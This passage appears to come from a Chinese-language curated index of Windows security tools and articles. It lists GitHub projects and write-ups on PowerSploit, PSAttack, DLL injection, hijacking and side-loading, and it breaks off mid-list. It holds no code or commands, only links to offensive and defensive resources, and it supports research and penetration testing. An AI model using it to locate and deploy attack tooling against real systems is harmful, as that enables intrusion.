[UAC](#40fd1488e4a26ebf908f44fdcedd9675) -> [(41)工具](#02517eda8c2519c564a19219e97d6237) [(139)文章](#90d7d5feb7fd506dc8fd6ee0d7e98285) - [AppLocker](#184bbacd8b9e08c30cc9ffcee9513f44) -> [(13)工具](#8f1876dff78e80b60d00de25994276d9) [(98)文章](#286317d6d7c1a0578d8f5db940201320) - [Data Execution Prevention(DEP)](#fa89526db1f9373c57ea4ffa1ac8c39f) -> [(1)工具](#10252fd90a09cb32b4e82497aa79f037) [(68)文章](#5ff9992a2474eb75e2a1b5860d5b87dc) - [Patch Guard(PG)](#edd6035c85e4ddf47939cc0e21505089) -> [(2)工具](#928f69b989fa9e8ec3436e361f646eac) [(24)文章](#998ed9d8013051b3c7b21b89d189d509) - [Driver Signature Enforcement(DSE)](#9820fc65cd69d9d295a81cfd90be12fe) -> [(11)工具](#18cbac58652453abbe2ff1aed187d370) [(11)文章](#b2d4a9c239c773d20bd4363a4a4c5d83) - [Windows Defender](#000972b0f2afd58a699bdceabfc21249) -> [(15)工具](#3296552ba5a3a76e4e1b1c0e1164adde) [(155)文章](#a61cee92890da1a569289b5c1daafb6e) - [Antimalware Scan Interface(AMSI)](#04b9831a450074392140722cd14df668) -> [(11)工具](#93e309abead4f559486dc29f539869de) [(62)文章](#15a5d4f48f2cd80986bd504c561d4a89) - [Address Space Layout Randomization(ASLR)](#b1324e23dc1b1314c3674203af4cb147) -> [(12)工具](#92a9071fd688be4888c2fbd493ae2d26) [(124)文章](#530581a7d5ef7c27b168a7f86ff642af) - [Control Flow Guard](#6fc6d2a82e58d5a0daa258dd87190fe5) -> [(4)工具](#5e156e74fbac1a857251ad7349fa55fe) - [Control Integrity Guard](#87d619895642fc563b2b31154ade189a) -> - [其他](#d1798993715e3e3a240884b7ff04b45d) -> - [MS1X](#7571369f732a6a16dfe727626709f702) -> [(46)工具](#a00506bcb946ba1c14c0747407dd2570) [(7)文章](#e08e4392157e48200f68d6e16e31c524) - [系统机制](#73aa875eba0a61328cda48b6d2b96135) - [RDP](#d8eb297358353fd465b9b6914327fc0c) - [(53) 工具](#f8078be0204bcc6c4b88b389d5e169d7) - [(70) 文章](#789aa51ac9d9c559e587cbd6ae85af8a) - [(141) 文章_0](#4ece6a5ac5b1176456fe44100a8b18d7) - [SMB](#2ccd7ff9d95435e841f8c667dda1338e) -> [(61)工具](#1d122fd6dda9ebbd4ee460facbaf1d4d) [(51)文章](#3832aa4bcf779dc33fed9dcd71129a59) - [Windows Management Instrumentation(WMI)](#25c0e7fba8e6523c9e60eaea718db391) -> [(37)工具](#a44289a4715b50988ac7cbfc1fca0a92) [(144)文章](#78882a933dbf22785891fe26ea95feb1) - [Event Tracing for Windows(ETW)](#ac43a3ce5a889d8b18cf22acb6c31a72) -> [(40)工具](#0af4bd8ca0fd27c9381a2d1fa8b71a1f) [(66)文章](#11c4c804569626c1eb02140ba557bb85) - [Lsass](#fe0ba7bd911de751b4cc28c9e1a6cb28) -> [(7)工具](#94693a3207198ec3c995deb0f38cc22c) [(22)文章](#b8904d923ae77cf3c230ee1e07717572) - [BitLocker](#5aa94d550d4ead20c77cb4c609378a40) -> [(10)工具](#624af4702d96b0df8f89e6142815f034) [(50)文章](#734243fcb4f539b563072a725e24b75f) - [NTFS](#645dbf50d2f476c438e48af8c9bcd78c) -> [(21)工具](#64624c6440889198d1c69ab40f1a5cf3) [(73)文章](#a976da792a1490b26da931174e05ee8f) - [SSDT](#b16c5b961088f60a61567d28844e9224) -> [(11)工具](#59abc34487b51ce7a5383d3f37308eac) [(57)文章](#6d2a886ff4abcae02d0968c17d4adfe2) - [Windows Registry](#23d474a347ac76b1ba3a1f5b178d5db9) -> [(12)工具](#7e46b2cafccc94889e3ac2722bf6b321) [(18)文章](#bc2ad2bfa13e8f6877934465ea611bf8) - [Component Object Model(COM)](#9f0ddf6e87cbaabd865deebde52699d4) -> [(1)工具](#77b9b279c18b90c20f672b68cc946da1) - [Distributed Component Object Model(DCOM)](#798eea99c85b0c02ecbde54172e9e11b) -> [(10)工具](#424a04890b93f5642ee2f69e394c9be8) [(35)文章](#b496048006faecf5545e9eb75072e718) - [Dynamic Data Exchange(DDE)](#9c0d0ea748ac8de5396932422c6cce10) -> [(5)文章](#5ff2332e36459054c8bf3ccd30480a1a) - [Compiled HTML Help(CHM)](#b05deb0cee0274fb02b27dd33edb80d1) -> [(4)文章](#a68ed31e2457d7ec9143428d05a8a755) - [WinSxS](#cd351af78b7ca5139f3ae343ecb0dd9c) -> [(1)工具](#1db8c6803d4c2abbdedc18aee7f85c8d) - [WoW64](#01210feb166b95c19ba9ac374f06a291) -> [(9)工具](#eb82daa5fe43dfd74bc02c47e2c4afe8) [(28)文章](#c6ca09f3f8597935d70aaf695629dc3a) - [Background Intelligent Transfer Service(BITS)](#0f805859001b5b52d63a7172bd44cdf6) -> [(2)工具](#b2f8f87055fddd1cf1c2c11401ad4e04) - [Batch Script(.bat)](#a658066df321965f221208dd00abe422) -> [(12)工具](#b1c6b964c60022c9dcd4ff69072dbda5) [(11)文章](#af21157c602c6800e744db567fd3e43c) - [DACL](#bf6cc44eeb15bfccaf0bf3750be50e2b) -> [(2)工具](#e7f9728a252a6e224e64a49da24b7312) [(6)文章](#04794a1f53e595fb81288e7f9a3ac1d4) - [WebDAV](#84f437e82aae8bfcecd2694e04fcf8aa) -> [(11)工具](#eb4696a47c7673522fd42c2a6e7cd8a7) [(26)文章](#869dec888564b2d2d13708bebbcc3f74) - [Group Policy Object(GPO)](#9c71937ab7d82876aac2c54c150791cc) -> [(1)工具](#578d958b7bb54c88abdf496c6e30647b) [(4)文章](#c468de52ae51e1caca7a00483464dd72) - [AppInit/AppCert](#6b68cefbacf54a6f75ca2f9018117a33) -> [(4)文章](#296d6cf1fb87b343a3084344c76d59ac) - [InstallUtil](#8f547f4f2f1e71c746324e72861c43f1) -> [(1)文章](#b05e41c16bfafb2f11a5cab1d79b9460) - [Image File Execution Option(IFEO)](#70f540d5729edd9eaf458082acdb22bc) -> [(5)文章](#16ffb3bcd11332055eb2adab920dff34) - [Mshta](#3dc4542422de4f6e2a8ea5d4f36e2481) -> [(6)文章](#ec9ec7966300b8a41b394dd5cfbed4c7) - [Microsoft HTML Application(HTA)](#8722d46369d07d677ad27d467c45e174) -> [(1)文章](#77e8c723a9f3e2b1df9b7778947c3400) - [NetShell](#7d3e42507cd5aef335800a1ad2ef81f2) -> [(2)工具](#8be076273c1e4f30dc40065080573125) [(1)文章](#bb3384e6aeb99870a31bc93c01f6a76e) - [VBScript](#4dad410f6466bbb44dd8f722a98b4542) -> [(9)工具](#cb35c6d81a6e143b6a70680e8ef9e02d) [(59)文章](#8d9d82756a32f13fcba26616b4f9aaf0) - [VBA](#ded9537532637d9e8cf34103b8074bb9) -> [(16)工具](#80b5cac54622fc99de46e2de95f2d187) [(76)文章](#24e894db7a4d419a9b186cd5546fdcd2) - [Security Service Provider(SSP)](#fdaecf463cde0ace2baf674360118a19) -> [(8)文章](#ca71d3c8c759ef191253380e005213c0) - [Scheduled Task](#cbe7925b4695d3f5e9f72f432a6530dc) -> [(6)工具](#f52a95e272df2e86c388e0dd076c4c6f) [(9)文章](#85a4495e6c53b1f5de50d3cf42de1084) - [Windows Remote Management(WinRM)](#0f90a8ce54f7bff9128b404dbab3d314) -> [(9)工具](#a0fe36873097f6dff84cdd7b3fe52fb2) [(16)文章](#c754ad3133666a921f924a0366fda9e0) - [Control Panel](#567c09f34e35410dc959657beb4da4d3) -> [(1)工具](#2f0c44bd470537ea2924f941129ec965) [(12)文章](#62bd550f94a11d68207c58a1753479cc) - [Windows Shortcut File](#6bdc12478a16b13a33c7ecd353f967b1) -> [(8)工具](#4a28a030e4074a0d09d31f9cadf7378f) [(18)文章](#29bf70714f8426a6f7804e277cb7b378) - [Windows Explorer](#09220acd8a80f802a330028acfd6454d) -> [(27)工具](#70a08a1d4ae425b9c2e2e336b832754a) [(4)文章](#97b6c206893c0d72beebd5c122542933) - [Application Shim](#4305fed600ce259233802ea6c6626887) -> [(7)文章](#10b9816b4775f22260658eef1d41860a) - [Squiblydoo](#061272d088606ae0778a04b31f3c0e46) -> [(2)文章](#1bd9e5df8902faae521e1dff195f2dbc) - [Open Office XML](#29ae3a9557d3c14f79aad2303e6bb828) -> [(1)工具](#177dd1d296e82b2dfad2cdcb2a37be2d) - [其他](#1c2073da678b183d1872ee62c568e7f5) -> - [各类软件](#928770b6fa4ff230a685448ae6573e52) - [MS Internet Explorer](#9bb54db4c51a3d146863d4ce1d36c498) -> [(32)工具](#d1119ba6c8e896a186d925ccac371d59) - [MS Edge](#9003b6891f28795af6a0f11622ed813b) -> [(19)工具](#ea3a3225108e179d9afe0b6e017dde52) [(51)文章](#0019e616c7579c7151faf531b4a0c771) - [MS Office](#63479a46662292ab817171322fecfcf4) -> [(17)工具](#40ce3b16876770b8c0bf0e67c0abf1e8) [(190)文章](#0e7bba8c1c7a86374dad4962cb4bfd9f) - [EMET](#979c4f76c79c7e7a453727c7d6ecd539) -> [(3)工具](#9d5a8c1da43df3879057ee7f1cd48c4e) [(118)文章](#c968b8e10a7f96dfdbea90a85e86c02c) - [psexec](#98f74e5f893a0c326ef336619bc515c4) -> [(3)工具](#336e94749dba45c45e97e436673d38a0) [(42)文章](#0d2c5f807488fe1e68d9a968d04d2b56) - [Nltest](#4a17ea9f0555ae7c61b9762fd789b23c) -> - [CMSTP.exe](#5c1479af60b597303b2a885e92c1e384) -> - [Rundll32](#cc6df9989a20eb5dd533f032daeca9b3) -> [(1)工具](#1e1be483a674d3e6330b31f0f11dadb5) [(12)文章](#68b21ccc26f1f7877ae8e70a907e67ce) - [Regsvr32](#3ebe3d66a05d92aed5459ed72f1e3678) -> [(2)工具](#c739394b21b3aad9293b747d7d141956) [(4)文章](#fdd93367db93bf20c10b5dbb6f6e1b0f) - [Regasm](#70d731a999b1cd69d565e35c98540ec9) -> - [Regsvcs](#b2008a3c57c0e58f8ea1d03f583eb1c1) -> - [svchost](#c8596ed2e3d35337492ccffcd5a87027) -> [(1)工具](#1928a187378080b11b7119305b61aad5) [(6)文章](#45a0356bc132fc320e96e8bbb5b340f9) - [MSBuild](#666aceb7939a7ba06d77a71a2baffeee) -> [(6)工具](#0f3c4b5cdc69b98c87e175ef7bb76396) [(14)文章](#1e5138d2ba592b1886ed23b8d22d2e07) - [csrss.exe](#6f70488efd1c03c94c309fb6e1e7f28a) -> [(21)文章](#9abd04f5352aa1714ccef5012cc33c6c) - [其他exe](#65a0235ddaea9da80145fa441eb0af2a) -> [(23)文章](#eceb5b79694c803399b0de795fffc296) - [SysInternalSuite](#d7a63740447f820c26b938b5bc391ef3) - [Sysmon](#0fed6a96b28f339611e7b111b8f42c23) -> [(36)工具](#d48f038b58dc921660be221b4e302f70) [(144)文章](#2c8cb7fdf765b9d930569f7c64042d62) - [Procmon](#dbc42caf465566897ecbb644fed1f271) -> [(4)工具](#518d80dfb8e9dda028d18ace1d3f3981) [(18)文章](#af06263e9a92f6036dc5d4c4b28b9d8c) - [Autoruns](#7da65659e7e463379d32be654003662c) -> [(7)工具](#c206afa40ed90711b49a572feb1e0c5b) [(17)文章](#23c49d681177101f0f7d15fcd15f2124) - [ProcessExplorer](#fdae9f5a384a5c230e577ac972be2de4) -> [(14)文章](#1b24c5ac9ca199d0397380f902868c73) - [其他](#836a3b7a9763957991fce4355439ad06) -> [(5)工具](#17fd6ceec67d0beed0bf54b117218123) [(20)文章](#ed25f17a9dd8092131cf45121e24aa68) - [工具](#b478e9a9a324c963da11437d18f04998) - [(84) 新添加的](#f9fad1d4d1f0e871a174f67f63f319d8) - [(5) Environment&&环境&&配置](#6d2fe834b7662ecdd48c17163f732daf) - [(8) 内核&&驱动](#c3cda3278305549f4c21df25cbf638a4) - [(3) 注册表](#920b69cea1fc334bbc21a957dd0d9f6f) - [(4) 系统调用](#d295182c016bd9c2d5479fe0e98a75df) - [(13) 其他](#1afda3039b4ab9a3a1f60b179ccb3e76) - [文章](#3939f5e83ca091402022cb58e0349ab8) - [(8) 新添加](#8e1344cae6e5f9a33e4e5718a012e292) # <a id="686597a4cff20c60a8e86116cde645fb"></a>PowerShell *** ## <a id="c65ce176ec6f9bbce520d5b97f4067db"></a>PowerSploit ### <a id="65a67d0db02390cee295385191ee5ee0"></a>工具 - [**6448**星][9d] [PS] [powershellmafia/powersploit](https://github.com/PowerShellMafia/PowerSploit) PowerSploit - A PowerShell Post-Exploitation Framework - [**346**星][1y] [C#] [ghostpack/sharpdump](https://github.com/ghostpack/sharpdump) SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. - [**213**星][3m] [Py] [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview) A (partial) Python rewriting of PowerSploit's PowerView ### <a id="0ab243d6d9d07fd24d8aa9a44ea03e89"></a>文章 - 2018.12 [aliyun] [Reel—在HackTheBox上的一次BloodHound & PowerSploit 活动目录渗透](https://xz.aliyun.com/t/3516) - 2018.11 [bugbountywriteup] [Reel — A BloodHound & PowerSploit Active Directory HackTheBox Walkthrough](https://medium.com/p/3745269b1a16) - 2018.02 [hackers] [PowerSploit, Part 1: How to Control Nearly any Windows System with Powersploit](https://www.hackers-arise.com/single-post/2018/02/24/PowerSploit-Part-1-How-to-Control-Nearly-any-Windows-System-with-Powersploit) - 2017.11 [mediaservice] [A patch for PowerSploit’s Invoke-Shellcode.ps1](https://techblog.mediaservice.net/2017/11/a-patch-for-powersploits-invoke-shellcode-ps1/) - 2017.06 [stealthbits] [Exploiting Weak Active Directory Permissions with PowerSploit](https://blog.stealthbits.com/exploiting-weak-active-directory-permissions-with-powersploit/) - 2017.04 [freebuf] [说说Powersploit在内网渗透中的使用](http://www.freebuf.com/sectool/131275.html) - 2017.03 [jpcert] [Malware Leveraging PowerSploit](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html) - 2016.01 [sans] [toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics](https://isc.sans.edu/forums/diary/toolsmith+112+Red+vs+Blue+PowerSploit+vs+PowerForensics/20579/) - 2016.01 [holisticinfosec] [toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics](https://holisticinfosec.blogspot.com/2016/01/toolsmith-112-red-vs-blue-powersploit.html) - 2015.05 [leonjza] [jenkins to meterpreter toying with powersploit](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter-toying-with-powersploit/) - 2013.04 [freebuf] [PowerSploit+Metasploit=Shells](http://www.freebuf.com/articles/system/8130.html) - 2012.05 [freebuf] [Post Exploitation工具 – PowerSploit](http://www.freebuf.com/sectool/2514.html) *** ## <a id="7a02de4887610ec52c49e64b95fe1580"></a>PSAttack ### <a id="65edc029f91b76eab19a2adb39966d55"></a>工具 ### <a id="5f6fc3b3e1eac08f477163970696725e"></a>文章 - 2017.07 [freebuf] [PSAttack:一个包含所有的渗透测试用例的攻击型Powershell脚本框架](http://www.freebuf.com/sectool/139910.html) - 2017.07 [4hou] [PSattack:一个渗透测试中使用的万能框架](http://www.4hou.com/info/news/6149.html) - 2016.11 [BSidesCHS] [BSidesCHS 2016: "Adding PowerShell to your Arsenal with PSAttack" - Jared Haight](https://www.youtube.com/watch?v=sHAujy9R70M) *** ## <a id="f00255b09a7cea498b2672c2c7447a04"></a>其他 ### <a id="882141dceab035af73809b75c83477f1"></a>工具 - [**216**星][23d] [PS] [mkellerman/invoke-commandas](https://github.com/mkellerman/invoke-commandas) Invoke Command As System/Interactive/GMSA/User on Local/Remote machine & returns PSObjects. ### <a id="06d2309e0637f481cdfac132c86142b3"></a>文章 - 2020.01 [4sysops] [Invoke-Command: Compensating for slow responding computers](https://4sysops.com/archives/invoke-command-compensating-for-slow-responding-computers/) - 2019.12 [4sysops] [Invoke-Command: Connecting to computers requiring different credentials](https://4sysops.com/archives/invoke-command-connecting-to-computers-requiring-different-credentials/) - 2019.12 [4sysops] [Invoke-Command: Dealing with offline computers](https://4sysops.com/archives/invoke-command-dealing-with-offline-computers/) - 2019.01 [sans] [Start-Process PowerShell - Get Forensic Artifact](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492181107.pdf) - 2018.12 [4sysops] [Running PowerShell remotely as SYSTEM with Invoke-CommandAs](https://4sysops.com/archives/running-powershell-remotely-as-system-with-invoke-commandas/) - 2013.12 [mikefrobbins] [PowerShell Remoting Error When Trying to use Invoke-Command Against a Domain Controller](http://mikefrobbins.com/2013/12/04/powershell-remoting-error-when-trying-to-use-invoke-command-against-a-domain-controller/) - 2013.01 [mikefrobbins] [PowerShell Remoting Insanity with AppAssure and the Invoke-Command Cmdlet](http://mikefrobbins.com/2013/01/31/powershell-remoting-insanity-with-appassure-and-the-invoke-command-cmdlet/) # <a id="89f963773ee87e2af6f9170ee60a7fb2"></a>DLL *** ## <a id="4dcfd9135aa5321b7fa65a88155256f9"></a>新添加 ### <a id="9753a9d52e19c69dc119bf03e9d7c3d2"></a>工具 - [**2064**星][10d] [C#] [lucasg/dependencies](https://github.com/lucasg/dependencies) A rewrite of the old legacy software "depends.exe" in C# for Windows devs to troubleshoot dll load dependencies issues. - [**1393**星][12m] [C] [fancycode/memorymodule](https://github.com/fancycode/memorymodule) Library to load a DLL from memory. - [**1232**星][10d] [C#] [perfare/il2cppdumper](https://github.com/perfare/il2cppdumper) Restore dll from Unity il2cpp binary file (except code) - [**810**星][10d] [C#] [terminals-origin/terminals](https://github.com/terminals-origin/terminals) Terminals is a secure, multi tab terminal services/remote desktop client. It uses Terminal Services ActiveX Client (mstscax.dll). The project started from the need of controlling multiple connections simultaneously. It is a complete replacement for the mstsc.exe (Terminal Services) client. This is official source moved from Codeplex. - [**396**星][8m] [C++] [hasherezade/dll_to_exe](https://github.com/hasherezade/dll_to_exe) Converts a DLL into EXE - [**385**星][19d] [C#] [3f/dllexport](https://github.com/3f/dllexport) .NET DllExport - 重复区段: [.NET->工具->新添加](#6b8b4bf156e5f973cf0485d45a94f4c4) | - [**371**星][12d] [PS] [netspi/pesecurity](https://github.com/NetSPI/PESecurity) PowerShell module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode. - [**255**星][16d] [C++] [wbenny/detoursnt](https://github.com/wbenny/detoursnt) Detours with just single dependency - NTDLL - [**236**星][21d] [C#] [erfg12/memory.dll](https://github.com/erfg12/memory.dll) C# Hacking library for making PC game trainers. - [**234**星][1y] [C#] [misaka-mikoto-tech/monohook](https://github.com/Misaka-Mikoto-Tech/MonoHook) hook C# method at runtime without modify dll file (such as UnityEditor.dll) - [**220**星][2m] [C++] [chuyu-team/mint](https://github.com/Chuyu-Team/MINT) Contains the definitions for the Windows Internal UserMode API from ntdll.dll, samlib.dll and winsta.dll. - [**203**星][10d] [C++] [s1lentq/regamedll_cs](https://github.com/s1lentq/regamedll_cs) a result of reverse engineering of original library mod HLDS (build 6153beta) using DWARF debug info embedded into linux version of HLDS, cs.so ### <a id="b05f4c5cdfe64e1dde2a3c8556e85827"></a>文章 - 2016.12 [sensepost] [Rattler:Identifying and Exploiting DLL Preloading Vulnerabilities](https://sensepost.com/blog/2016/rattleridentifying-and-exploiting-dll-preloading-vulnerabilities/) - 2012.10 [netspi] [Testing Applications for DLL Preloading Vulnerabilities](https://blog.netspi.com/testing-applications-for-dll-preloading-vulnerabilities/) - 2010.08 [microsoft] [More information about the DLL Preloading remote attack vector](https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/) - 2009.09 [evilcodecave] [DllExportComparer](https://evilcodecave.wordpress.com/2009/09/04/dllexportcomparer/) - 2009.07 [pediy] [[原创]dll下载器分析](https://bbs.pediy.com/thread-94312.htm) - 2009.07 [addxorrol] [Poking around MSVIDCTL.DLL](http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html) - 2009.07 [rapid7] [IE DirectShow (msvidctl.dll) MPEG-2 Metasploit Exploit](https://blog.rapid7.com/2009/07/07/ie-directshow-msvidctldll-mpeg-2-metasploit-exploit/) - 2009.07 [sans] [0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks](https://isc.sans.edu/forums/diary/0day+in+Microsoft+DirectShow+msvidctldll+used+in+driveby+attacks/6733/) - 2009.07 [vexillium] [DllMain and its uncovered possibilites](http://j00ru.vexillium.org/?p=80) - 2009.07 [vexillium] [DllMain and its uncovered possibilites](https://j00ru.vexillium.org/2009/07/dllmain-and-its-uncovered-possibilites/) - 2009.06 [pediy] [[原创]使用GCC创建 Windows NT 下的内核DLL](https://bbs.pediy.com/thread-92537.htm) - 2009.06 [pediy] [[Anti Virus专题]1.7 - 打造DLL内存加载引擎.](https://bbs.pediy.com/thread-90441.htm) - 2009.05 [pediy] [[原创]dll 全局api hook 一例(附代码)](https://bbs.pediy.com/thread-90109.htm) - 2009.05 [pediy] [[原创]Fengyue's DLL-Game.exe 加壳流程简单分析](https://bbs.pediy.com/thread-89706.htm) - 2009.05 [travisgoodspeed] [FET Firmware from MSP430.DLL](http://travisgoodspeed.blogspot.com/2009/05/fet-firmware-from-msp430dll.html) - 2009.05 [pediy] [[原创]暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞](https://bbs.pediy.com/thread-87617.htm) - 2009.05 [pediy] [[原创]暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞](https://bbs.pediy.com/thread-87616.htm) - 2009.04 [pediy] [[求助]windows mobile dll的一个问题](https://bbs.pediy.com/thread-86211.htm) - 2009.04 [pediy] [不需要依赖dllmain触发的CE注入代码](https://bbs.pediy.com/thread-85899.htm) - 2009.03 [pediy] [[原创]用DELPHI编写DLL插件为Windows记事本增加各种功能](https://bbs.pediy.com/thread-84730.htm) *** ## <a id="3b4617e54405a32290224b729ff9f2b3"></a>DLL注入 ### <a id="b0d50ee42d53b1f88b32988d34787137"></a>工具 - [**994**星][1m] [C] [fdiskyou/injectallthethings](https://github.com/fdiskyou/injectallthethings) Seven different DLL injection techniques in one single project. - [**747**星][7m] [C++] [darthton/xenos](https://github.com/darthton/xenos) Windows DLL 注入器 - [**635**星][3m] [PS] [monoxgas/srdi](https://github.com/monoxgas/srdi) Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode ### <a id="1a0b0dab4cdbab08bbdc759bab70dbb6"></a>文章 - 2019.06 [aliyun] [Windows 10 Task Scheduler服务DLL注入漏洞分析](https://xz.aliyun.com/t/5286) - 2018.10 [pediy] [[原创]代替创建用户线程使用ShellCode注入DLL的小技巧](https://bbs.pediy.com/thread-247515.htm) - 2018.10 [4hou] [如何利用DLL注入绕过Win10勒索软件保护](http://www.4hou.com/technology/13923.html) - 2018.10 [0x00sec] [Reflective Dll Injection - Any Way to check If a process is already injected?](https://0x00sec.org/t/reflective-dll-injection-any-way-to-check-if-a-process-is-already-injected/8980/) - 2018.09 [pediy] [[原创]win10_arm64 驱动注入dll 到 arm32程序](https://bbs.pediy.com/thread-247032.htm) - 2018.08 [freebuf] [sRDI:一款通过Shellcode实现反射型DLL注入的强大工具](http://www.freebuf.com/sectool/181426.html) - 2018.07 [4hou] [注入系列——DLL注入](http://www.4hou.com/technology/12703.html) - 2018.06 [0x00sec] [Reflective DLL Injection - AV detects at runtime](https://0x00sec.org/t/reflective-dll-injection-av-detects-at-runtime/7307/) - 2018.06 [qq] [【游戏漏洞】注入DLL显示游戏窗口](http://gslab.qq.com/article-508-1.html) - 2017.12 [secist] [Mavinject | Dll Injected](http://www.secist.com/archives/5912.html) - 2017.12 [secvul] [SSM终结dll注入](https://secvul.com/topics/951.html) - 2017.10 [nsfocus] [【干货分享】Sandbox技术之DLL注入](http://blog.nsfocus.net/sandbox-technology-dll-injection/) - 2017.10 [freebuf] [DLL注入新姿势:反射式DLL注入研究](http://www.freebuf.com/articles/system/151161.html) - 2017.10 [pediy] [[原创]通过Wannacry分析内核shellcode注入dll技术](https://bbs.pediy.com/thread-221756.htm) - 2017.09 [360] [Dll注入新姿势:SetThreadContext注入](https://www.anquanke.com/post/id/86786/) - 2017.08 [silentbreaksecurity] [sRDI – Shellcode Reflective DLL Injection](https://silentbreaksecurity.com/srdi-shellcode-reflective-dll-injection/) - 2017.08 [360] [DLL注入那些事](https://www.anquanke.com/post/id/86671/) - 2017.08 [freebuf] [系统安全攻防战:DLL注入技术详解](http://www.freebuf.com/articles/system/143640.html) - 2017.08 [pediy] [[翻译]多种DLL注入技术原理介绍](https://bbs.pediy.com/thread-220405.htm) - 2017.07 [0x00sec] [Reflective DLL Injection](https://0x00sec.org/t/reflective-dll-injection/3080/) *** ## <a id="f39e40e340f61ae168b67424baac5cc6"></a>DLL劫持 ### <a id="c9cdcc6f4acbeda6c8ac8f4a1ba1ea6b"></a>工具 - [**441**星][9m] [Pascal] [mojtabatajik/robber](https://github.com/mojtabatajik/robber) 查找易于发生DLL劫持的可执行文件 - [**327**星][1y] [C++] [anhkgg/superdllhijack](https://github.com/anhkgg/superdllhijack) 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了 ### <a id="01e95333e07439ac8326253aa8950b4f"></a>文章 - 2019.06 [4hou] [戴尔预装的SupportAssist组件存在DLL劫持漏洞,全球超过1亿台设备面临网络攻击风险](https://www.4hou.com/vulnerable/18764.html) - 2019.05 [4hou] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://www.4hou.com/technology/18008.html) - 2019.04 [3gstudent] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://3gstudent.github.io/3gstudent.github.io/Lateral-Movement-SCM-and-DLL-Hijacking-Primer-%E7%9A%84%E5%88%A9%E7%94%A8%E6%89%A9%E5%B1%95/) - 2019.04 [3gstudent] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://3gstudent.github.io/3gstudent.github.io/Lateral-Movement-SCM-and-DLL-Hijacking-Primer-%E7%9A%84%E5%88%A9%E7%94%A8%E6%89%A9%E5%B1%95/) - 2019.04 [specterops] [Lateral Movement — SCM and Dll Hijacking Primer](https://medium.com/p/d2f61e8ab992) - 2019.01 [sans] [DLL Hijacking Like a Boss!](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493862085.pdf) - 2018.11 [t00ls] [一种通用DLL劫持技术研究](https://www.t00ls.net/articles-48756.html) - 2018.11 [pediy] [[原创]一种通用DLL劫持技术研究](https://bbs.pediy.com/thread-248050.htm) - 2018.09 [DoktorCranium] [Understanding how DLL Hijacking works](https://www.youtube.com/watch?v=XADSrZEJdXY) - 2018.09 [astr0baby] [Understanding how DLL Hijacking works](https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works/) - 2018.08 [parsiya] [DVTA - Part 5 - Client-side Storage and DLL Hijacking](https://parsiya.net/blog/2018-08-25-dvta-part-5-client-side-storage-and-dll-hijacking/) - 2018.08 [parsiya] [DVTA - Part 5 - Client-side Storage and DLL Hijacking](https://parsiya.net/blog/2018-08-25-dvta---part-5---client-side-storage-and-dll-hijacking/) - 2018.06 [cybereason] [Attackers incriminate a signed Oracle process for DLL hijacking, running Mimikatz](https://www.cybereason.com/blog/oracle-mimikatz-dll-hijacking) - 2018.05 [360] [独辟蹊径:如何通过URL文件实现DLL劫持](https://www.anquanke.com/post/id/145715/) - 2018.05 [insert] [利用URL文件实现DLL劫持](https://insert-script.blogspot.com/2018/05/dll-hijacking-via-url-files.html) - 2017.10 [cybereason] [Siofra, a free tool built by Cybereason researcher, exposes DLL hijacking vulnerabilities in Windows programs](https://www.cybereason.com/blog/blog-siofra-free-tool-exposes-dll-hijacking-vulnerabilities-in-windows) - 2017.08 [securiteam] [SSD Advisory – Dashlane DLL Hijacking](https://blogs.securiteam.com/index.php/archives/3357) - 2017.05 [4hou] [Windows 下的 7 种 DLL 劫持技术](http://www.4hou.com/technology/4945.html) - 2017.05 [pediy] [[原创]让代码飞出一段钢琴曲(freepiano小助手)(全局键盘钩子+dll劫持)+有码](https://bbs.pediy.com/thread-217330.htm) - 2017.03 [pentestlab] [DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) *** ## <a id="7f17d2efd0021063bd713a1b9ee2f46e"></a>DLL旁加载 ### <a id="ec3149509e7612fb1a2126948f141bc0"></a>文章 - 2016.04 [hackingarticles] [Hack Remote Windows PC using Office OLE multiple DLL side loading vulnerabilities](http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-side-loading-vulnerabilities/) - 2015.12 [securify] [DLL side loading vulnerability in VMware Host Guest Client Redirector](https://securify.nl/en/advisory/SFY20151201/dll-side-loading-vulnerability-in-vmware-host-guest-client-redirector.html) - 2015.11 [securify] [MapsUpdateTask Task DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20151101/mapsupdatetask-task-dll-side-loading-vulnerability.html) - 2015.11 [securify] [Shutdown UX DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20151102/shutdown-ux-dll-side-loading-vulnerability.html) - 2015.09 [securify] [HP ToComMsg DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150902/hp-tocommsg-dll-side-loading-vulnerability.html) - 2015.09 [securify] [BDA MPEG2 Transport Information Filter DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150906/bda-mpeg2-transport-information-filter-dll-side-loading-vulnerability.html) - 2015.09 [securify] [NPS Datastore server DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150905/nps-datastore-server-dll-side-loading-vulnerability.html) - 2015.09 [securify] [Windows Mail Find People DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150904/windows-mail-find-people-dll-side-loading-vulnerability.html) - 2015.09 [securify] [HP LaserJet Fax Preview DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150903/hp-laserjet-fax-preview-dll-side-loading-vulnerability.html) - 2015.09 